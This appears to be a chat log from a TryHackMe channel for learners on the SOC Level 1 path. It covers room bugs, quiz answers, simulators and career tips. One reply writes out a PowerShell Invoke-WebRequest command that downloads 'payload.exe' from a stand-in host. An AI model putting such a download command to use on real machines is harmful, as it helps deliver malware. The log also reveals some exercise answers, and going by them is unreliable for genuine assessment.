Hi Guys, New to this room. I'm stuck in the "Summit" room. The Start Machine button is grayed out. Do I need to setup a virtual machine to complete this room ?

I have the same issue in another room Alert Triage With Elastic.

Found the fix for my issue. I needed to click Join Room button which was next to the first question, instead of at the top of the page. Once clicked, the Start Machine button was activated. Issue resolved. @full berry

Thx I just did the same and it's working!

Gave +1 Rep to @real lark (current: #3665 - 1)

Does anyone also have an issue launching the Splunk web interface for the room Alert Triage with Splunk?

Never mind it worked

Hello everyone. I have a quick question regarding SOCL1. Do I need a business plan in order to finish the learning path? I'm asking because of the SOC Scenarios.. Thanks 🙂

No 🙂

Thank you very much

I passed my sec+. Any advice on what to do next?

Nice! What materials did you use as study guides?

Yippeeeee 😎

I used mainly messers videos and Jason Dion’s practice exams

Gratz

Hi everyone, please, is tryhackme loading? I have not been able to login

Works fine for me

Congrats 🚀 🔥

@Malware Concepts for SOC Recap
Am I missing something?

It seems those Echo recaps are sometimes too literal and not flexible enough to accept a valid answer.
I haven't done that one but try commands with the powershell command itself like powershell -c "Invoke-WebRequest http://example.com/payload.exe" -OutFile C:\temp\payload.exe or a wget maybe.

Didn't work 🤔

Im stuck on this recap question 😭

Reorder the steps to search for and examine a specific file in a Linux system

Use find to locate the specific file by name
Navigate to the target directory using cd
Use ls to list the contents of the current directory
Display the file contents using cat

was a splunk room removed from the soc tier 1 path? i only see splunk basics now, i remember there was another one if i am not mistaken

in SIEM Triage for SOC module there is an "Alert Triage with Splunk" room

oh yeah thats exactly what i was looking for thanks!

Gave +1 Rep to @tight sage (current: #3680 - 1)

I tried a lot of orders its always giving wrong answer could i please get some help.

Rooms are buggy i think
Someone who can help me why showmount is not working here :

I think it is the new attackbox that is buggy, not the room (tho I might be mistaken).
It's just like its (default) ping which does not work, I had to find the "real" binary to make it work.
I suggest you try the same with something like find / -name showmount 2>/dev/null

Thanks

this time it seems my own fault
I had the wrong box to attack open

Tomorrow the capstone one and then finally ready with this hard rooms

hey guys, why can't I do Soc simulator? I'm premium

So do points earned from simulators not count towards league points, for example the "Phishing Unfolding" simulator?

Good day everyone, am I a beginner and an aspiring SOC analyst from Philippines. Just wondering if I can I have your insights and tips or any helpful learnings on how do I efficiently absorb and learn through TryHackMe platform. Big thanks

Are are you enrolled in team or not yet ? btw

To Become Good SOC You will have to think in parellel I meant by this You will have to know the way well tactics of the attacker If You dont know the pattern Attacker what you will defend protect ? Attacker will easily bypss

• Along THM we have many sources depending on 1 resource will be problem af because benefit of the thm is its bginners friendly But After sometimes it's Spoonfeed

So you will have to work more places like linux, overwire , there are many places wher eyou can practice

I have a subscription to THM, currently learning whenever I have free time after work.

alr got any doubts ? I have muted all servers so I ai'nt go ya reply '

That would be all sir, It's just overwhelming since there are a lot of information and feels like an endless learning which is really is the reality in cybersecurity. I think being curious and passionate to this field would be beneficial and make my own journey and I would practice it most of the time. Thanks for you time and valuable insight. Have a great one!

Hello guys

Hey guys, I was just wondering if, during some SOC simulations, there is a way of copy some text from the alert queue and paste it inside the Analyst VM ?

Thanks Feel Freee to ask if you got stuck smwhere

Gave +1 Rep to @hardy perch (current: #3702 - 1)

or somwehat guidance

idk about what you're doing, but i know highlight and ctrl+C usually works for me, then ctrl+V to paste

im not able to do that...

Hi folks, been feeling really disheartned as I completed most of the SOC Level 1 path but struggle on some portions of the challenges like Tempest and Boogeyman 1. Is it normal to struggle with some questions on these even after completing the path?

yeah I really struggled with Tempest. Not too sure why its in SOC1, not a lot of tatics needed were coved in the path. Boogeyman 1-3 are quite better, with 1 (in my opinion) being the more challenging of the 3.

Im on the last few questions on boogeyman 3

good to hear because Tempest was definitely challenging. Boogeyman 1 was still challenging but better and I just did boogeyman 2 and felt way better on that one.

I meant boogyeman 3 😭

I was up too late and did not see my typo

Hey guys im on SOC L1 path and i do not understand one thing. Im on SOC MEtrics and Objectives and i have this task:

`Imagine a scenario where an employee was lured into running data stealer malware.

1. The SOC team received the "Connection to Redline Stealer C2" alert after 12 minutes.
2. One of the L1 analysts on shift moved the alert to In Progress 10 minutes later.
3. After 6 minutes, the alert was escalated to L2, who spent 35 minutes cleaning the malware.
   Provide the MTTD, MTTA, and MTTR via comma as your answer (e.g. 10,20,30).`

i could not come up with proper answer because i was inputting || 12,10,41 ||

i even asked Echo like 10 times and he still insisted i am correct and it is || 12,10,41 ||

but it seems answer is || 12,10,51 || why is that?

Echo does not agree with that and claims this is an error in exercise lol, but i doubt thats the case

Echo is wrong. MTTR (Mean Time to Respond) is the time taken by SOC to actually stop the breach from spreading. In this scenario, ||L1 took 10 minutes of analysis to conclude to change the alert's status to In Progress instead of closing it as false positive (that is valuable time taken against the malware, without it there is no L2) . Then L1 took 6 more minutes to document the findings and assign it to L2 who then took 35 minutes to fix it. So 10+6+35=51||

Hey
hope you guys are doing okay
please suggest me some rooms that teach how to report incidents to L2 and how to properly conduct initial triage

thanks a lot, that makes sense

Gave +1 Rep to @orchid aurora (current: #286 - 37)

OK I legit cant with boogeyman 3.... A lot of the stuff in it was NEVER coved in the soc1 path.

What iv been really stuck on is "Share enumeration"

Done!

For jr soc analyst remote job is possible?

@crystal shadow Yes, it should be. Large SOCs try to have 24/7 coverage. Often remote work helps to make it easier to have that coverage..

Same here have been struggling with the temptest and boogeyman part

The temptest on SoC 1 level path have been on it for a week and still haven't completed the room

Try the SoC 1 level path the beginning of the room you will learn about escalation

Thanks 👍

Gave +1 Rep to @tawny sphinx (current: #3714 - 1)

is there any written resources for this path ? so I can revise

Evening Guys any senior Soc analyst here ?

hello guys, i wanted to know when we should escalate the alert in the soc sim and in general, because sometimes i feel like it's not necessary but the feedback tells me that i should've done it

In The Greenholt Phish room - is the lab machine supposed to have network access? Some of the questions ask you to check SPF and WHOIs records and I can't connect to anything either in Firefox or from the command line.

is there notes for the soc level 1 path

??

You can make them yourself and it will be of benefit to you

hello guys, ia want to ask about this task, when i answer computer internet
but system reject my answer with "Uh-oh! The answer you provided may not be in English. Please review it and try again."
Am I wrong, or am I mistaken about my answer?

Your answer Computers and Internet would be right but the task seems outdated as Talos seems to have updated the category for this domain. The expected answer is ||Computer Security|| which is still a valid category at Talos https://talosintelligence.com/categories .

Hey! Did thm remove the BlackCat and Upload and Conquer rooms from the SOC Level 1 path recently? was planning on doing them this week but couldn't find them 🥲

thx sir

Gave +1 Rep to @orchid aurora (current: #263 - 42)

Those are SOC simulators and not rooms

Cheers @worthy tide , apologies for the misuse of the word. I was mainly wondering why access to those sims seems to have disappeared from the SOC Level 1 path when they were accessible before. I even found this Medium article from Aug 2025 showing BlackCat as part of the path

Those are only available for business subscribers and them being in the path caused some problems, hence they were removed

Ahh gotcha, cheers for clarifying mate! Bit of a shame though, wish those were included too. Ah well, it is what it is 😞

Have a great weekend and thanks for answering!

Gave +1 Rep to @worthy tide (current: #44 - 269)

i cant solve this question iei got the answer using cyber chef but now i dont know its not taking the correct answer can anyone help me ?

Assuming you already solved this as it just says you are going to fast. I have that aswell when i change a typo in the answer 🙂

Skipping some rooms in learning path will get certificate
I mean in every learning path showing some rooms pay premium and some rooms are free how will I get certificate ?

You pay for a pretty cheap subscription

Are there any good resources for cheat sheets that list things like wire shark filters, splunk searches, etc. I get all the concepts, but hate taking all the notes lol.

The Wireshark Packet Operations VM is really slow for some reason. Been like that for the last 3 days...

Are you supposed to use the websites just by looking them up in your own browser (not a vm) in this soc l1 path

In presecurity you just used the sources that were given

Network Security Essentials room. I can't open Splunk, i tried localhost:8000 but unable to connect, what to do?

nvm managed to solve it

I like the SOC Analyst Path but I willl admit that the Windows Security module is the most painful thing ive done so far

Purely because event viewer keeps freezing

Do you also use tools that arent told by tryhackme?